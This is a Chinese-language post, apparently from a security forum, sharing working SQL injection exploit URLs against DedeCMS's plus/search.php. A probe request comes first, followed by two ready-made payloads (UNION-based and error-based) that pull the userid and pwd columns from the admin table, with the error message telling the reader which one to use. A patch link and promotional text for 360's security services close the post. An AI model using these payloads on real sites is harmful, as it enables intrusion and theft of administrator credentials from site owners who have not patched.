dedecms plus/search.php 注入漏洞利用EXP

华夏久久

转载不加作者名的没JJ

哎。没意识，我一个月前就发现了这个漏洞，可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了，我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的：
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

转载不加作者名的没JJ
作者：鬼哥

看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a



看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a



如果正常显示证明漏洞不存在了。

华夏久久

织梦官方补丁程序下载地址：　　http://updatenew.dedecms.com/bas ... v57sp1-20130115.zip
　　关于360网站安全服务
　　360为站长提供免费的网站安全解决方案，包括360网站安全检测平台和360网站卫士：
　　360网站安全检测平台是国内首个集网站漏洞检测、网站挂马监控、网站篡改监控于一体的免费检测平台，拥有全面的网站漏洞库及蜜罐集群检测系统，能够第一时间协助网站检测修复漏洞;
　　360网站卫士则为站长免费提供网站防火墙、DDOS保护、CC保护、智能DNS解析、盗链保护、页面压缩、缓存加速和永久在线等服务。
　　关于奇虎360科技有限公司
　　360(NYSEIHU)是中国领先的互联网安全服务提供商。按照用户数量计算，目前360是中国前三大互联网公司之一。据第三方数据显示，作为互联网“免费安全”的首创者，360为逾4亿中国互联网用户提供领先的互联网和无线安全产品及服务，用户渗透率逾90%。360通过提供细致、完善的平台服务以及网络安全服务，以开放平台实现商业价值，与合作伙伴共同建立起多方共赢的互联网生态体系。